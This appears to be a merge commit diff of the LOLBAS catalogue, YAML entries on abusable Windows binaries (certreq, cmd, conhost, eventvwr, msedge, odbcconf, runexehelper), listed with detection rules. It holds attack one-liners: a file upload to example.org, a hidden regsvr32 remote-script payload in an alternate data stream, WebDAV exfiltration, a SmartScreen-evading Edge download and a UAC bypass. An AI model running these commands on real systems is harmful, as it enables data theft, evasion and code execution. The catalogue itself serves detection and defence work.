Merge pull request #3 from LOLBAS-Project/master

Merge master branch from official project
2025-07-31 22:52:51 +02:00 · 2023-04-30 14:35:28 +03:00
parent e803bc7635 787c87470e
commit 5f14405172
38 changed files with 254 additions and 40 deletions
--- a/yml/OSBinaries/Certreq.yml
+++ b/yml/OSBinaries/Certreq.yml
@@ -10,14 +10,14 @@ Commands:
    Category: Download
    Privileges: User
    MitreID: T1105
-    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+    OperatingSystem: Windows 10, Windows 11
  - Command: CertReq -Post -config https://example.org/ c:\windows\win.ini and show response in terminal
    Description: Send the file c:\windows\win.ini to the endpoint https://example.org/ via HTTP POST
    Usecase: Upload
    Category: Upload
    Privileges: User
    MitreID: T1105
-    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+    OperatingSystem: Windows 10, Windows 11
 Full_Path:
  - Path: C:\Windows\System32\certreq.exe
  - Path: C:\Windows\SysWOW64\certreq.exe
--- a/yml/OSBinaries/Cmd.yml
+++ b/yml/OSBinaries/Cmd.yml
@@ -1,7 +1,7 @@
 ---
 Name: Cmd.exe
 Description: The command-line interpreter in Windows
-Author: 'Ye Yint Min Thu Htut'
+Author: Ye Yint Min Thu Htut
 Created: 2019-06-26
 Commands:
  - Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat
@@ -9,7 +9,7 @@ Commands:
    Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
    Category: ADS
    Privileges: User
-    MitreID: T1059.003
+    MitreID: T1564.004
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
  - Command: cmd.exe - < fakefile.doc:payload.bat
    Description: Execute payload.bat stored in an Alternate Data Stream (ADS).
@@ -18,6 +18,20 @@ Commands:
    Privileges: User
    MitreID: T1059.003
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+  - Command: type \\webdav-server\folder\file.ext > C:\Path\file.ext
+    Description: Downloads a specified file from a WebDAV server to the target file.
+    Usecase: Download/copy a file from a WebDAV server
+    Category: Download
+    Privileges: User
+    MitreID: T1105
+    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+  - Command: type C:\Path\file.ext > \\webdav-server\folder\file.ext
+    Description: Uploads a specified file to a WebDAV server.
+    Usecase: Upload a file to a WebDAV server
+    Category: Upload
+    Privileges: User
+    MitreID: T1048.003
+    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Full_Path:
  - Path: C:\Windows\System32\cmd.exe
  - Path: C:\Windows\SysWOW64\cmd.exe
@@ -29,6 +43,11 @@ Detection:
  - IOC: cmd.exe creating/modifying file contents in an alternate data stream.
 Resources:
  - Link: https://twitter.com/yeyint_mth/status/1143824979139579904
+  - Link: https://twitter.com/Mr_0rng/status/1601408154780446721
+  - Link: https://medium.com/@mr-0range/a-new-lolbin-using-the-windows-type-command-to-upload-download-files-81d7b6179e22
+  - Link: https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/type
 Acknowledgement:
  - Person: r0lan
    Handle: '@yeyint_mth'
+  - Person: Mr.0range
+    Handle: '@mr_0rng'
--- a/yml/OSBinaries/Conhost.yml
+++ b/yml/OSBinaries/Conhost.yml
@@ -11,6 +11,13 @@ Commands:
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows 10, Windows 11
+  - Command: "conhost.exe --headless calc.exe"
+    Description: Execute calc.exe with conhost.exe as parent process
+    Usecase: Specify --headless parameter to hide child process window (if applicable)
+    Category: Execute
+    Privileges: User
+    MitreID: T1202
+    OperatingSystem: Windows 10, Windows 11
 Full_Path:
  - Path: c:\windows\system32\conhost.exe
 Detection:
@@ -19,6 +26,8 @@ Detection:
 Resources:
  - Link: https://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/
  - Link: https://twitter.com/Wietze/status/1511397781159751680
+  - Link: https://twitter.com/embee_research/status/1559410767564181504
+  - Link: https://twitter.com/ankit_anubhav/status/1561683123816972288
 Acknowledgement:
  - Person: Adam
    Handle: '@hexacorn'
--- a/yml/OSBinaries/Eventvwr.yml
+++ b/yml/OSBinaries/Eventvwr.yml
@@ -14,9 +14,9 @@ Commands:
  - Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe
    Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net
    Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters.
-    Category: Execute
+    Category: UAC Bypass
    Privileges: Administrator
-    MitreID: T1202
+    MitreID: T1548.002
    OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
  - Path: C:\Windows\System32\eventvwr.exe
@@ -26,7 +26,7 @@ Code_Sample:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/b08b3e2b0d5111c637dbede1381b07cb79f8c2eb/rules/windows/process_creation/process_creation_sysmon_uac_bypass_eventvwr.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/b08b3e2b0d5111c637dbede1381b07cb79f8c2eb/rules/windows/registry_event/registry_event_uac_bypass_eventvwr.yml
-  - Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/file_event/file_event_win_uac_bypass_eventvwr.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/d31ea6253ea40789b1fc49ade79b7ec92154d12a/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml
  - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/eventvwr_uac_bypass.yml
  - IOC: eventvwr.exe launching child process other than mmc.exe
--- a/yml/OSBinaries/Explorer.yml
+++ b/yml/OSBinaries/Explorer.yml
@@ -1,7 +1,7 @@
 ---
 Name: Explorer.exe
 Description: Binary used for managing files and system components within Windows
-Author: 'Jai Minton'
+Author: Jai Minton
 Created: 2020-06-24
 Commands:
  - Command: explorer.exe /root,"C:\Windows\System32\calc.exe"
@@ -21,8 +21,6 @@ Commands:
 Full_Path:
  - Path: C:\Windows\explorer.exe
  - Path: C:\Windows\SysWOW64\explorer.exe
-Code_Sample:
-  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_explorer_break_proctree.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_explorer.yml
--- a/yml/OSBinaries/GfxDownloadWrapper.yml
+++ b/yml/OSBinaries/GfxDownloadWrapper.yml
@@ -1,178 +0,0 @@
---
-Name: GfxDownloadWrapper.exe
-Description: Remote file download used by the Intel Graphics Control Panel, receives as first parameter a URL and a destination file path.
-Author: Jesus Galvez
-Created: 2019-12-27
-Commands:
-  - Command: C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"
-    Description: GfxDownloadWrapper.exe downloads the content that returns URL and writes it to the file DESTINATION FILE PATH. The binary is signed by "Microsoft Windows Hardware", "Compatibility Publisher", "Microsoft Windows Third Party Component CA 2012", "Microsoft Time-Stamp PCA 2010", "Microsoft Time-Stamp Service".
-    Usecase: Download file from internet
-    Category: Download
-    Privileges: User
-    MitreID: T1105
-    OperatingSystem: Windows 10
-Full_Path:
-  - Path: c:\windows\system32\driverstore\filerepository\64kb6472.inf_amd64_3daef03bbe98572b\
-  - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_0e9c57ae3396e055\
-  - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_209bd95d56b1ac2d\
-  - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_3fa2a843f8b7f16d\
-  - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_85c860f05274baa0\
-  - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_f7412e3e3404de80\
-  - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_feb9f1cf05b0de58\
-  - Path: c:\windows\system32\driverstore\filerepository\cui_component.inf_amd64_0219cc1c7085a93f\
-  - Path: c:\windows\system32\driverstore\filerepository\cui_component.inf_amd64_df4f60b1cae9b14a\
-  - Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_16eb18b0e2526e57\
-  - Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_1c77f1231c19bc72\
-  - Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_31c60cc38cfcca28\
-  - Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_82f69cea8b2d928f\
-  - Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_b4d94f3e41ceb839\
-  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_0606619cc97463de\
-  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_0e95edab338ad669\
-  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_22aac1442d387216\
-  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_2461d914696db722\
-  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_29d727269a34edf5\
-  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_2caf76dbce56546d\
-  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_353320edb98da643\
-  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_4ea0ed0af1507894\
-  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_56a48f4f1c2da7a7\
-  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_64f23fdadb76a511\
-  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_668dd0c6d3f9fa0e\
-  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6be8e5b7f731a6e5\
-  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6dad7e4e9a8fa889\
-  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6df442103a1937a4\
-  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_767e7683f9ad126c\
-  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_8644298f665a12c4\
-  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_868acf86149aef5d\
-  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_92cf9d9d84f1d3db\
-  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_93239c65f222d453\
-  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_9de8154b682af864\
-  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_a7428663aca90897\
-  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_ad7cb5e55a410add\
-  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_afbf41cf8ab202d7\
-  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_d193c96475eaa96e\
-  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_db953c52208ada71\
-  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_e7523682cc7528cc\
-  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_e9f341319ca84274\
-  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_f3a64c75ee4defb7\
-  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_f51939e52b944f4b\
-  - Path: c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_4938423c9b9639d7\
-  - Path: c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_c8e108d4a62c59d5\
-  - Path: c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_deecec7d232ced2b\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_01ee1299f4982efe\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_02edfc87000937e4\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0541b698fc6e40b0\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0707757077710fff\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0b3e3ed3ace9602a\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0cff362f9dff4228\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_16ed7d82b93e4f68\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1a33d2f73651d989\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1aca2a92a37fce23\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1af2dd3e4df5fd61\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1d571527c7083952\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_23f7302c2b9ee813\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_24de78387e6208e4\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_250db833a1cd577e\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_25e7c5a58c052bc5\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_28d80681d3523b1c\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_2dda3b1147a3a572\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_31ba00ea6900d67d\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_329877a66f240808\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_42af9f4718aa1395\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_4645af5c659ae51a\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_48c2e68e54c92258\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_48e7e903a369eae2\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_491d20003583dabe\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_4b34c18659561116\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_51ce968bf19942c2\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_555cfc07a674ecdd\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_561bd21d54545ed3\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_579a75f602cc2dce\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_57f66a4f0a97f1a3\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_587befb80671fb38\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_62f096fe77e085c0\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6ae0ddbb4a38e23c\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6bb02522ea3fdb0d\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6d34ac0763025a06\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_712b6a0adbaabc0a\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_78b09d9681a2400f\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_842874489af34daa\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_88084eb1fe7cebc3\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_89033455cb08186f\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_8a9535cd18c90bc3\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_8c1fc948b5a01c52\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_9088b61921a6ff9f\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_90f68cd0dc48b625\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_95cb371d046d4b4c\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_a58de0cf5f3e9dca\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_abe9d37302f8b1ae\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_acb3edda7b82982f\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_aebc5a8535dd3184\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_b5d4c82c67b39358\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_b846bbf1e81ea3cf\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_babb2e8b8072ff3b\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_bc75cebf5edbbc50\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_be91293cf20d4372\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c11f4d5f0bc4c592\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c4e5173126d31cf0\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c4f600ffe34acc7b\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c8634ed19e331cda\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c9081e50bcffa972\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_ceddadac8a2b489e\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d4406f0ad6ec2581\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d5877a2e0e6374b6\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d8ca5f86add535ef\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_e8abe176c7b553b5\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_eabb3ac2c517211f\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_f8d8be8fea71e1a0\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_fe5e116bb07c0629\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_fe73d2ebaa05fb95\
-  - Path: c:\windows\system32\driverstore\filerepository\igdlh64_kbl_kit127397.inf_amd64_e1da8ee9e92ccadb\
-  - Path: c:\windows\system32\driverstore\filerepository\k127153.inf_amd64_364f43f2a27f7bd7\
-  - Path: c:\windows\system32\driverstore\filerepository\k127153.inf_amd64_3f3936d8dec668b8\
-  - Path: c:\windows\system32\driverstore\filerepository\k127793.inf_amd64_3ab7883eddccbf0f\
-  - Path: c:\windows\system32\driverstore\filerepository\ki129523.inf_amd64_32947eecf8f3e231\
-  - Path: c:\windows\system32\driverstore\filerepository\ki126950.inf_amd64_fa7f56314967630d\
-  - Path: c:\windows\system32\driverstore\filerepository\ki126951.inf_amd64_94804e3918169543\
-  - Path: c:\windows\system32\driverstore\filerepository\ki126973.inf_amd64_06dde156632145e3\
-  - Path: c:\windows\system32\driverstore\filerepository\ki126974.inf_amd64_9168fc04b8275db9\
-  - Path: c:\windows\system32\driverstore\filerepository\ki127005.inf_amd64_753576c4406c1193\
-  - Path: c:\windows\system32\driverstore\filerepository\ki127018.inf_amd64_0f67ff47e9e30716\
-  - Path: c:\windows\system32\driverstore\filerepository\ki127021.inf_amd64_0d68af55c12c7c17\
-  - Path: c:\windows\system32\driverstore\filerepository\ki127171.inf_amd64_368f8c7337214025\
-  - Path: c:\windows\system32\driverstore\filerepository\ki127176.inf_amd64_86c658cabfb17c9c\
-  - Path: c:\windows\system32\driverstore\filerepository\ki127390.inf_amd64_e1ccb879ece8f084\
-  - Path: c:\windows\system32\driverstore\filerepository\ki127678.inf_amd64_8427d3a09f47dfc1\
-  - Path: c:\windows\system32\driverstore\filerepository\ki127727.inf_amd64_cf8e31692f82192e\
-  - Path: c:\windows\system32\driverstore\filerepository\ki127807.inf_amd64_fc915899816dbc5d\
-  - Path: c:\windows\system32\driverstore\filerepository\ki127850.inf_amd64_6ad8d99023b59fd5\
-  - Path: c:\windows\system32\driverstore\filerepository\ki128602.inf_amd64_6ff790822fd674ab\
-  - Path: c:\windows\system32\driverstore\filerepository\ki128916.inf_amd64_3509e1eb83b83cfb\
-  - Path: c:\windows\system32\driverstore\filerepository\ki129407.inf_amd64_f26f36ac54ce3076\
-  - Path: c:\windows\system32\driverstore\filerepository\ki129633.inf_amd64_d9b8af875f664a8c\
-  - Path: c:\windows\system32\driverstore\filerepository\ki129866.inf_amd64_e7cdca9882c16f55\
-  - Path: c:\windows\system32\driverstore\filerepository\ki130274.inf_amd64_bafd2440fa1ffdd6\
-  - Path: c:\windows\system32\driverstore\filerepository\ki130350.inf_amd64_696b7c6764071b63\
-  - Path: c:\windows\system32\driverstore\filerepository\ki130409.inf_amd64_0d8d61270dfb4560\
-  - Path: c:\windows\system32\driverstore\filerepository\ki130471.inf_amd64_26ad6921447aa568\
-  - Path: c:\windows\system32\driverstore\filerepository\ki130624.inf_amd64_d85487143eec5e1a\
-  - Path: c:\windows\system32\driverstore\filerepository\ki130825.inf_amd64_ee3ba427c553f15f\
-  - Path: c:\windows\system32\driverstore\filerepository\ki130871.inf_amd64_382f7c369d4bf777\
-  - Path: c:\windows\system32\driverstore\filerepository\ki131064.inf_amd64_5d13f27a9a9843fa\
-  - Path: c:\windows\system32\driverstore\filerepository\ki131176.inf_amd64_fb4fe914575fdd15\
-  - Path: c:\windows\system32\driverstore\filerepository\ki131191.inf_amd64_d668106cb6f2eae0\
-  - Path: c:\windows\system32\driverstore\filerepository\ki131622.inf_amd64_0058d71ace34db73\
-  - Path: c:\windows\system32\driverstore\filerepository\ki132032.inf_amd64_f29660d80998e019\
-  - Path: c:\windows\system32\driverstore\filerepository\ki132337.inf_amd64_223d6831ffa64ab1\
-  - Path: c:\windows\system32\driverstore\filerepository\ki132535.inf_amd64_7875dff189ab2fa2\
-  - Path: c:\windows\system32\driverstore\filerepository\ki132544.inf_amd64_b8c1f31373153db4\
-  - Path: c:\windows\system32\driverstore\filerepository\ki132574.inf_amd64_54c9b905b975ee55\
-  - Path: c:\windows\system32\driverstore\filerepository\ki132869.inf_amd64_052eb72d070df60f\
-  - Path: c:\windows\system32\driverstore\filerepository\kit126731.inf_amd64_1905c9d5f38631d9\
-Detection:
-  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_file_download_via_gfxdownloadwrapper.yml
-  - IOC: Usually GfxDownloadWrapper downloads a JSON file from https://gameplayapi.intel.com.
-Resources:
-  - Link: https://www.sothis.tech/author/jgalvez/
-Acknowledgement:
-  - Person: Jesus Galvez
-    Handle:
--- a/yml/OSBinaries/Msedge.yml
+++ b/yml/OSBinaries/Msedge.yml
@@ -0,0 +1,29 @@
+---
+Name: Msedge.exe
+Description: Microsoft Edge browser
+Author: mr.d0x
+Created: 2022-01-20
+Commands:
+  - Command: msedge.exe https://example.com/file.exe.txt
+    Description: Edge will launch and download the file. A harmless file extension (e.g. .txt, .zip) should be appended to avoid SmartScreen.
+    Usecase: Download file from the internet
+    Category: Download
+    Privileges: User
+    MitreID: T1105
+    OperatingSystem: Windows 10, Windows 11
+  - Command: msedge.exe --headless --enable-logging --disable-gpu --dump-dom "http://example.com/evil.b64.html" > out.b64
+    Description: Edge will silently download the file. File extension should be .html and binaries should be encoded.
+    Usecase: Download file from the internet
+    Category: Download
+    Privileges: User
+    MitreID: T1105
+    OperatingSystem: Windows 10, Windows 11
+Full_Path:
+  - Path: c:\Program Files\Microsoft\Edge\Application\msedge.exe
+  - Path: c:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
+Resources:
+  - Link: https://twitter.com/mrd0x/status/1478116126005641220
+  - Link: https://twitter.com/mrd0x/status/1478234484881436672
+Acknowledgement:
+  - Person: mr.d0x
+    Handle: '@mrd0x'
--- a/yml/OSBinaries/Odbcconf.yml
+++ b/yml/OSBinaries/Odbcconf.yml
@@ -4,15 +4,24 @@ Description: Used in Windows for managing ODBC connections
 Author: 'Oddvar Moe'
 Created: 2018-05-25
 Commands:
-  - Command: odbcconf -f file.rsp
-    Description: Load DLL specified in target .RSP file. See the payloads folder for an example .RSP file.
+  - Command: odbcconf /a {REGSVR c:\test\test.dll}
+    Description: Execute DllREgisterServer from DLL specified.
    Usecase: Execute dll file using technique that can evade defensive counter measures
    Category: Execute
    Privileges: User
    MitreID: T1218.008
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: odbcconf /a {REGSVR c:\test\test.dll}
-    Description: Execute DllREgisterServer from DLL specified.
+  - Command: |
+      odbcconf INSTALLDRIVER "lolbas-project|Driver=c:\test\test.dll|APILevel=2"
+      odbcconf configsysdsn "lolbas-project" "DSN=lolbas-project"
+    Description: Install a driver and load the DLL. Requires administrator privileges.
+    Usecase: Execute dll file using technique that can evade defensive counter measures
+    Category: Execute
+    Privileges: User
+    MitreID: T1218.008
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+  - Command: odbcconf -f file.rsp
+    Description: Load DLL specified in target .RSP file. See the Code Sample section for an example .RSP file.
    Usecase: Execute dll file using technique that can evade defensive counter measures
    Category: Execute
    Privileges: User
@@ -22,7 +31,7 @@ Full_Path:
  - Path: C:\Windows\System32\odbcconf.exe
  - Path: C:\Windows\SysWOW64\odbcconf.exe
 Code_Sample:
-  - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/file.rsp
+  - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/58b5eb751379501aa237275f14381f0902e979a5/Archive-Old-Version/OSBinaries/Payload/file.rsp
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_odbcconf.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml
@@ -30,7 +39,7 @@ Detection:
 Resources:
  - Link: https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b
  - Link: https://github.com/woanware/application-restriction-bypasses
-  - Link: https://twitter.com/Hexacorn/status/1187143326673330176
+  - Link: https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/
 Acknowledgement:
  - Person: Casey Smith
    Handle: '@subtee'
--- a/yml/OSBinaries/Rdrleakdiag.yml
+++ b/yml/OSBinaries/Rdrleakdiag.yml
@@ -31,7 +31,8 @@ Full_Path:
 Code_Sample:
  - Code:
 Detection:
-  - Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_process_dump_rdrleakdiag.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_proc_dump_rdrleakdiag.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_process_dump_rdrleakdiag.yml
  - Elastic: https://www.elastic.co/guide/en/security/current/potential-credential-access-via-windows-utilities.html
  - Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml
 Resources:
--- a/yml/OSBinaries/Runexehelper.yml
+++ b/yml/OSBinaries/Runexehelper.yml
@@ -0,0 +1,24 @@
+---
+Name: Runexehelper.exe
+Description: Launcher process
+Author: Grzegorz Tworek
+Created: 2022-12-13
+Commands:
+  - Command: runexehelper.exe c:\windows\system32\calc.exe
+    Description: 'Launches the specified exe. Prerequisites: (1) diagtrack_action_output environment variable must be set to an existing, writable folder; (2) runexewithargs_output.txt file cannot exist in the folder indicated by the variable.'
+    Usecase: Executes arbitrary code
+    Category: Execute
+    Privileges: User
+    MitreID: T1218
+    OperatingSystem: Windows 10, Windows 11, Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022
+Full_Path:
+  - Path: c:\windows\system32\runexehelper.exe
+Detection:
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_runexehelper.yml
+  - IOC: c:\windows\system32\runexehelper.exe is run
